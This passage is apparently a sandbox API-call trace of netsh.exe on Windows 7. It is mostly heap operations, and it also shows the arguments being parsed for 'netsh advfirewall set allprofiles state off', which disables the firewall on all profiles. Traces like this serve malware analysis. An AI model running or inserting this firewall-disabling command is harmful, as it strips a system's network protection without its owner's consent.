0x2c0000 [0223.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x347f40 [0223.038] GetProcessHeap () returned 0x2c0000 [0223.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4b0 | out: hHeap=0x2c0000) returned 1 [0223.038] RegisterContext () returned 0x0 [0223.038] GetProcessHeap () returned 0x2c0000 [0223.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x150) returned 0x347670 [0223.038] GetProcessHeap () returned 0x2c0000 [0223.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347f40 | out: hHeap=0x2c0000) returned 1 [0223.039] RegisterContext () returned 0x0 [0223.039] GetProcessHeap () returned 0x2c0000 [0223.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec4b0 [0223.039] GetProcessHeap () returned 0x2c0000 [0223.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0223.039] RegisterContext () returned 0x0 [0223.039] GetProcessHeap () returned 0x2c0000 [0223.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec530 [0223.039] GetProcessHeap () returned 0x2c0000 [0223.039] HeapFree (in: hHeap=0x2c0000, 
dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0223.040] RegisterContext () returned 0x0 [0223.040] GetProcessHeap () returned 0x2c0000 [0223.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x930) returned 0x349f10 [0223.040] GetProcessHeap () returned 0x2c0000 [0223.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346da0 | out: hHeap=0x2c0000) returned 1 [0223.040] RegisterContext () returned 0x0 [0223.040] GetProcessHeap () returned 0x2c0000 [0223.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9a0) returned 0x34a850 [0223.041] GetProcessHeap () returned 0x2c0000 [0223.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x349f10 | out: hHeap=0x2c0000) returned 1 [0225.859] RegisterContext () returned 0x0 [0225.859] GetProcessHeap () returned 0x2c0000 [0225.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa10) returned 0x34f180 [0225.860] GetProcessHeap () returned 0x2c0000 [0225.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a850 | out: hHeap=0x2c0000) returned 1 [0225.860] RegisterContext () returned 0x0 [0225.860] GetProcessHeap () returned 0x2c0000 [0225.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec6b0 [0225.860] GetProcessHeap () returned 0x2c0000 [0225.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0225.863] SetConsoleCtrlHandler (HandlerRoutine=0xc99198, Add=1) returned 1 [0225.863] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x77940000 [0225.864] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0225.864] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0225.870] FreeLibrary (hLibModule=0x77940000) returned 1 [0225.872] _wcsicmp (_String1="advfirewall", _String2="-?") returned 52 [0225.872] _wcsicmp (_String1="advfirewall", _String2="-h") returned 52 [0225.872] _wcsicmp (_String1="advfirewall", _String2="?") returned 34 [0225.872] _wcsicmp 
(_String1="advfirewall", _String2="/?") returned 50 [0225.879] _wcsicmp (_String1="advfirewall", _String2="-v") returned 52 [0225.879] _wcsicmp (_String1="advfirewall", _String2="-a") returned 52 [0225.879] _wcsicmp (_String1="advfirewall", _String2="-c") returned 52 [0225.879] _wcsicmp (_String1="advfirewall", _String2="-f") returned 52 [0225.883] _wcsicmp (_String1="advfirewall", _String2="-r") returned 52 [0225.885] _wcsicmp (_String1="advfirewall", _String2="-u") returned 52 [0225.885] _wcsicmp (_String1="advfirewall", _String2="-p") returned 52 [0225.885] GetVersionExW (in: lpVersionInformation=0x147520*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x147520*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.888] _vsnwprintf (in: _Buffer=0xca5b80, _BufferCount=0x103, _Format="%d.%d.%d", _ArgList=0x1474e8 | out: _Buffer="6.1.7601") returned 8 [0225.921] _vsnwprintf (in: _Buffer=0xca5fa0, _BufferCount=0x103, _Format="%d", _ArgList=0x1474e8 | out: _Buffer="7601") returned 4 [0225.921] _vsnwprintf (in: _Buffer=0xca5d90, _BufferCount=0x103, _Format="%d", _ArgList=0x1474e8 | out: _Buffer="1") returned 1 [0225.921] _vsnwprintf (in: _Buffer=0xca61b0, _BufferCount=0x103, _Format="%d", _ArgList=0x1474e8 | out: _Buffer="0") returned 1 [0225.921] GetProcessHeap () returned 0x2c0000 [0225.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x33a990 [0225.921] GetProcessHeap () returned 0x2c0000 [0225.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x33a9b0 [0225.921] GetProcessHeap () returned 0x2c0000 [0225.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x33a9d0 [0225.921] GetProcessHeap () returned 0x2c0000 [0225.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 
0x33a9f0 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x33aa10 [0225.922] wcscpy_s (in: _Destination=0x33aa10, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33a9d0 | out: hHeap=0x2c0000) returned 1 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33a9b0 | out: hHeap=0x2c0000) returned 1 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x33a9b0 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x33a9d0 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32ea80 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x33aa30 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x33aa50 [0225.922] wcscpy_s (in: _Destination=0x33aa50, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a880 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x307390 [0225.922] wcscpy_s (in: _Destination=0x307390, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a8a0 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] RtlAllocateHeap 
(HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a8c0 [0225.923] wcscpy_s (in: _Destination=0x34a8c0, _SizeInWords=0xc, _Source="allprofiles" | out: _Destination="allprofiles") returned 0x0 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a8e0 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x34a900 [0225.923] wcscpy_s (in: _Destination=0x34a900, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a920 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3073b0 [0225.923] wcscpy_s (in: _Destination=0x3073b0, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ea80 | out: hHeap=0x2c0000) returned 1 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33a9d0 | out: hHeap=0x2c0000) returned 1 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x33a9d0 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a940 [0225.923] wcscpy_s (in: _Destination=0x34a940, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33aa50 | out: hHeap=0x2c0000) returned 1 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33aa30 | out: hHeap=0x2c0000) returned 1 
[0225.923] GetProcessHeap () returned 0x2c0000 [0225.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x33aa30 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x33aa50 [0225.924] wcscpy_s (in: _Destination=0x33aa50, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a940 | out: hHeap=0x2c0000) returned 1 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33a9d0 | out: hHeap=0x2c0000) returned 1 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x33a9d0 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3073c0 [0225.924] wcscpy_s (in: _Destination=0x3073c0, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x307390 | out: hHeap=0x2c0000) returned 1 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a880 | out: hHeap=0x2c0000) returned 1 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a880 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a940 [0225.924] wcscpy_s (in: _Destination=0x34a940, _SizeInWords=0xc, _Source="allprofiles" | out: _Destination="allprofiles") returned 0x0 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a8c0 | out: hHeap=0x2c0000) returned 1 [0225.924] GetProcessHeap () returned 
0x2c0000 [0225.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a8a0 | out: hHeap=0x2c0000) returned 1 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a8a0 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x34a8c0 [0225.925] wcscpy_s (in: _Destination=0x34a8c0, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a900 | out: hHeap=0x2c0000) returned 1 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a8e0 | out: hHeap=0x2c0000) returned 1 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a8e0 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x307390 [0225.925] wcscpy_s (in: _Destination=0x307390, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3073b0 | out: hHeap=0x2c0000) returned 1 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a920 | out: hHeap=0x2c0000) returned 1 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x34b7f0 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x34a920 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a900 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] RtlAllocateHeap 
(HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3073b0 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a960 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x34a980 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3073d0 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x34a9a0 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x34a9a0, Size=0xe) returned 0x34a9c0 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x34a9c0, Size=0x24) returned 0x346000 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x346000, Size=0x26) returned 0x346030 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x346030, Size=0x2c) returned 0x34b830 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x34b830, Size=0x2e) returned 0x34b870 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x34b870, Size=0x44) returned 0x32d3f0 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x32d3f0, Size=0x46) returned 0x32d440 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x32d440, Size=0x50) returned 0x32ea80 [0225.927] GetProcessHeap () returned 0x2c0000 [0225.927] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x32ea80, Size=0x52) returned 0x32eb40 [0225.927] GetProcessHeap () returned 0x2c0000 [0225.927] RtlReAllocateHeap 
(Heap=0x2c0000, Flags=0x0, Ptr=0x32eb40, Size=0x58) returned 0x32ea80 [0225.969] GetProcessHeap () returned 0x2c0000 [0225.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ea80 | out: hHeap=0x2c0000) returned 1 [0225.969] _wcsnicmp (_String1="advfirewall", _String2="dump", _MaxCount=0xb) returned -3 [0225.972] _wcsnicmp (_String1="advfirewall", _String2="help", _MaxCount=0xb) returned -7 [0225.972] _wcsnicmp (_String1="advfirewall", _String2="?", _MaxCount=0xb) returned 34 [0225.972] _wcsnicmp (_String1="advfirewall", _String2="exec", _MaxCount=0xb) returned -4 [0225.975] _wcsnicmp (_String1="advfirewall", _String2="advfirewall", _MaxCount=0xb) returned 0 [0225.975] GetProcessHeap () returned 0x2c0000 [0225.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a9c0 [0225.975] GetProcessHeap () returned 0x2c0000 [0225.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a9a0 [0225.997] GetProcessHeap () returned 0x2c0000 [0225.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32ea80 [0226.004] GetProcessHeap () returned 0x2c0000 [0226.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a9e0 [0226.004] GetProcessHeap () returned 0x2c0000 [0226.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x34aa00 [0226.004] wcscpy_s (in: _Destination=0x34aa00, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0226.004] GetProcessHeap () returned 0x2c0000 [0226.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34aa20 [0226.005] GetProcessHeap () returned 0x2c0000 [0226.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34aa40 [0226.005] wcscpy_s (in: _Destination=0x34aa40, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0226.005] GetProcessHeap () returned 0x2c0000 [0226.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 
Size=0x18) returned 0x34aa60 [0226.005] GetProcessHeap () returned 0x2c0000 [0226.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3073e0 [0226.005] wcscpy_s (in: _Destination=0x3073e0, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0226.005] GetProcessHeap () returned 0x2c0000 [0226.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34aa80 [0226.005] GetProcessHeap () returned 0x2c0000 [0226.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34aaa0 [0226.005] wcscpy_s (in: _Destination=0x34aaa0, _SizeInWords=0xc, _Source="allprofiles" | out: _Destination="allprofiles") returned 0x0 [0226.005] GetProcessHeap () returned 0x2c0000 [0226.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34aac0 [0226.005] GetProcessHeap () returned 0x2c0000 [0226.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x34aae0 [0226.006] wcscpy_s (in: _Destination=0x34aae0, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0226.006] GetProcessHeap () returned 0x2c0000 [0226.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34ab00 [0226.006] GetProcessHeap () returned 0x2c0000 [0226.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3073f0 [0226.006] wcscpy_s (in: _Destination=0x3073f0, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0226.006] GetProcessHeap () returned 0x2c0000 [0226.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ea80 | out: hHeap=0x2c0000) returned 1 [0226.006] GetProcessHeap () returned 0x2c0000 [0226.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a9a0 | out: hHeap=0x2c0000) returned 1 [0226.006] GetProcessHeap () returned 0x2c0000 [0226.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34aa40 | out: hHeap=0x2c0000) returned 1 [0226.006] GetProcessHeap () returned 0x2c0000 [0226.006] 
RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34aa40 [0226.006] _wcsnicmp (_String1="set", _String2="dum", _MaxCount=0x3) returned 15 [0226.006] _wcsnicmp (_String1="set", _String2="hel", _MaxCount=0x3) returned 11 [0226.006] _wcsnicmp (_String1="set", _String2="?", _MaxCount=0x3) returned 52 [0226.007] _wcsnicmp (_String1="set", _String2="res", _MaxCount=0x3) returned 1 [0226.007] _wcsnicmp (_String1="set", _String2="imp", _MaxCount=0x3) returned 10 [0226.007] _wcsnicmp (_String1="set", _String2="exp", _MaxCount=0x3) returned 14 [0226.007] _wcsnicmp (_String1="set", _String2="con", _MaxCount=0x3) returned 16 [0226.007] _wcsnicmp (_String1="set", _String2="fir", _MaxCount=0x3) returned 13 [0226.007] _wcsnicmp (_String1="set", _String2="mai", _MaxCount=0x3) returned 6 [0226.007] _wcsnicmp (_String1="set", _String2="mon", _MaxCount=0x3) returned 6 [0226.007] _wcsnicmp (_String1="set", _String2="set", _MaxCount=0x3) returned 0 [0226.007] _wcsnicmp (_String1="allprofiles", _String2="help", _MaxCount=0xb) returned -7 [0226.007] _wcsnicmp (_String1="allprofiles", _String2="?", _MaxCount=0xb) returned 34 [0226.007] wcstok (in: _String="domainprofile", _Delimiter=" ", _Context=0x1b69c0 | out: _String="domainprofile", _Context=0x1b69c0) returned="domainprofile" [0226.008] _wcsnicmp (_String1="allprofiles", _String2="domainprofi", _MaxCount=0xb) returned -3 [0226.008] wcstok (in: _String="privateprofile", _Delimiter=" ", _Context=0x1b69f0 | out: _String="privateprofile", _Context=0x1b69f0) returned="privateprofile" [0226.008] _wcsnicmp (_String1="allprofiles", _String2="privateprof", _MaxCount=0xb) returned -15 [0226.008] wcstok (in: _String="publicprofile", _Delimiter=" ", _Context=0x1b6a20 | out: _String="publicprofile", _Context=0x1b6a20) returned="publicprofile" [0226.008] _wcsnicmp (_String1="allprofiles", _String2="publicprofi", _MaxCount=0xb) returned -15 [0226.008] wcstok (in: _String="currentprofile", _Delimiter=" ", _Context=0x1b6a50 | out: 
_String="currentprofile", _Context=0x1b6a50) returned="currentprofile" [0226.008] _wcsnicmp (_String1="allprofiles", _String2="currentprof", _MaxCount=0xb) returned -2 [0226.008] wcstok (in: _String="allprofiles", _Delimiter=" ", _Context=0x1ac720 | out: _String="allprofiles", _Context=0x1ac720) returned="allprofiles" [0226.008] _wcsnicmp (_String1="allprofiles", _String2="allprofiles", _MaxCount=0xb) returned 0 [0226.009] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned 0x0 [0229.530] LoadStringW (in: hInstance=0x0, uID=0x2, lpBuffer=0x1431d0, cchBufferMax=8192 | out: lpBuffer="Ok.\n") returned 0x4 [0229.636] FormatMessageW (in: dwFlags=0x500, lpSource=0x1431d0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x1431b0, nSize=0x0, Arguments=0x1431c0 | out: lpBuffer="癐4") returned 0x5 [0229.636] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.636] GetConsoleOutputCP () returned 0x1b5 [0229.637] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Ok.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0229.637] GetProcessHeap () returned 0x2c0000 [0229.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x6) returned 0x307400 [0229.637] GetConsoleOutputCP () returned 0x1b5 [0229.637] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Ok.\r\n", cchWideChar=-1, lpMultiByteStr=0x307400, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ok.\r\n", lpUsedDefaultChar=0x0) returned 6 [0229.637] WriteFile (in: hFile=0x7, lpBuffer=0x307400*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x143160, lpOverlapped=0x0 | out: lpBuffer=0x307400*, lpNumberOfBytesWritten=0x143160*=0x5, lpOverlapped=0x0) returned 1 [0229.638] GetProcessHeap () returned 0x2c0000 [0229.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x307400 | out: hHeap=0x2c0000) 
returned 1 [0229.639] LocalFree (hMem=0x347650) returned 0x0 [0229.639] FormatMessageW (in: dwFlags=0x500, lpSource=0xc91504, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x1471e0, nSize=0x0, Arguments=0x1471f0 | out: lpBuffer="ꦠ4") returned 0x2 [0229.639] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0229.639] GetConsoleOutputCP () returned 0x1b5 [0229.639] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0229.639] GetProcessHeap () returned 0x2c0000 [0229.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x3) returned 0x307400 [0229.639] GetConsoleOutputCP () returned 0x1b5 [0229.639] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x307400, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0229.639] WriteFile (in: hFile=0x7, lpBuffer=0x307400*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x147190, lpOverlapped=0x0 | out: lpBuffer=0x307400*, lpNumberOfBytesWritten=0x147190*=0x2, lpOverlapped=0x0) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x307400 | out: hHeap=0x2c0000) returned 1 [0229.640] LocalFree (hMem=0x34a9a0) returned 0x0 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a920 | out: hHeap=0x2c0000) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a900 | out: hHeap=0x2c0000) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3073b0 | out: hHeap=0x2c0000) returned 1 [0229.640] GetProcessHeap () returned 0x2c0000 [0229.640] HeapFree (in: hHeap=0x2c0000, 
